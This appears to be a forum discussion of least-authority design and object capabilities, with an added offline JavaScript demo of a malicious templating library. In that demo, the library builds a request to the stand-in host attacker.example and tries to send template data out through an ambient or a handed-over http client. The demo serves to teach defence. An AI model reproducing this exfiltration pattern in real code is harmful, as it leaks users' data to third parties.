by snek
2752 days ago
What would be the sane behaviour for the following situation?

my app imports an http request library and gives it net permissions
my app imports a templating library and gives it no permissions
the templating library is malicious and tries to import well known http request libraries, and finds the one I imported, which has been given net permissions.

Or what if you give the templating library a mixin of some sort which accidentally exposes the privileged http library?
The best way to enforce POLA, and especially this particular problem of not allowing libraries to have access to each other, is object capabilities (ocaps) [3]. An object capability combines designation with authority -- if you have access to a capability, you can use it. If you don't have access, you can't use it. You can think of this (very roughly) as a key to a car as opposed to your name being on a guest list for a party. I didn't really touch on ocaps in this piece, but it's a necessary component for being able to enforce POLA well.
[1] https://developers.google.com/caja/
[2] https://www.youtube.com/watch?v=3ME7oHHQbuM
[3] http://habitatchronicles.com/2017/05/what-are-capabilities/
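An added example (not code from the original post, the commenter, or any runtime the thread discusses) that models snek's scenario in plain JavaScript: a privileged http client, a malicious templating library granted nothing, and three ways of wiring them together. The "http client", the module registry, and every URL are constructed for the example; the client appends to a log instead of opening sockets, so it runs offline. The first run shows ambient authority (the templating library finds the privileged library by name), the second shows the ocap version from the reply (designation is authority, so an unnamed reference cannot be used), and the third shows the "accidental mixin" case handled with an attenuated capability rather than the full client.

```javascript
// Added example, not from the original post or the project it discusses.
// It models the scenario above: a privileged http library, an unprivileged
// templating library that is malicious, and three ways of wiring them.
// The "http client" is constructed: it appends to a log instead of opening
// sockets, so everything runs offline.

// A fake module registry standing in for ambient authority: anything any
// module can reach by name (a module cache, globalThis.fetch, ...).
const sharedRegistry = new Map();

// Constructed http client: the only "network" effect is a log entry.
function makeHttpClient(log) {
  return {
    get(url) {
      log.push(`GET ${url}`);
      return { status: 200, url };
    },
  };
}

// Attenuation: a capability that forwards only to one host. The closure
// holds the full client; nothing on the returned object leads back to it.
function attenuate(http, allowedHost, audit) {
  return Object.freeze({
    get(url) {
      if (new URL(url).host !== allowedHost) {
        audit.push(`denied ${url}`);
        throw new Error(`only ${allowedHost} is allowed`);
      }
      return http.get(url);
    },
  });
}

// The malicious templating library. It was granted nothing, but it tries
// two routes to the network: the ambient registry, and whatever capability
// object the caller happens to hand it.
const maliciousTemplateLib = {
  render(tpl, caps = {}) {
    const exfil = `https://attacker.example/exfil?t=${encodeURIComponent(tpl)}`;
    if (caps.http && caps.partialsUrl) {
      caps.http.get(caps.partialsUrl); // the legitimate use it was given
    }
    const ambient = sharedRegistry.get("http-lib"); // route 1: ambient lookup
    if (ambient) ambient.get(exfil);
    if (caps.http) { // route 2: abuse the handed-over reference
      try { caps.http.get(exfil); } catch (_) { /* attenuated: denied */ }
    }
    return tpl.toUpperCase();
  },
};

// 1. Ambient authority: the app "imports" the http library into a shared
//    namespace, so the templating library finds it by name.
function runAmbient() {
  const log = [];
  sharedRegistry.set("http-lib", makeHttpClient(log));
  try {
    maliciousTemplateLib.render("hello");
  } finally {
    sharedRegistry.delete("http-lib");
  }
  return log; // the exfiltration request went out
}

// 2. Object capability: the client reference lives in the app's scope only.
//    The templating library is handed nothing it can name, so it gets nothing.
function runOcap() {
  const log = [];
  const http = makeHttpClient(log);
  const out = maliciousTemplateLib.render("hello");
  http.get("https://api.example/data"); // the app itself still has net
  return { log, out };
}

// 3. The "accidental mixin" case: the templating library genuinely needs to
//    fetch partials, so the app hands it an attenuated capability instead of
//    the full client. The exfil attempt is refused; the partial fetch works.
function runAttenuated() {
  const log = [];
  const audit = [];
  const http = makeHttpClient(log);
  const cdnOnly = attenuate(http, "cdn.example", audit);
  maliciousTemplateLib.render("hello", {
    http: cdnOnly,
    partialsUrl: "https://cdn.example/partials/header.html",
  });
  return { log, audit };
}
```

The point of the three runs is the one made in the reply: once there is no global namespace to consult, the templating library's only authority is what is passed to it, and if something must be passed, pass a wrapper that forwards a subset rather than the object that carries the full permission.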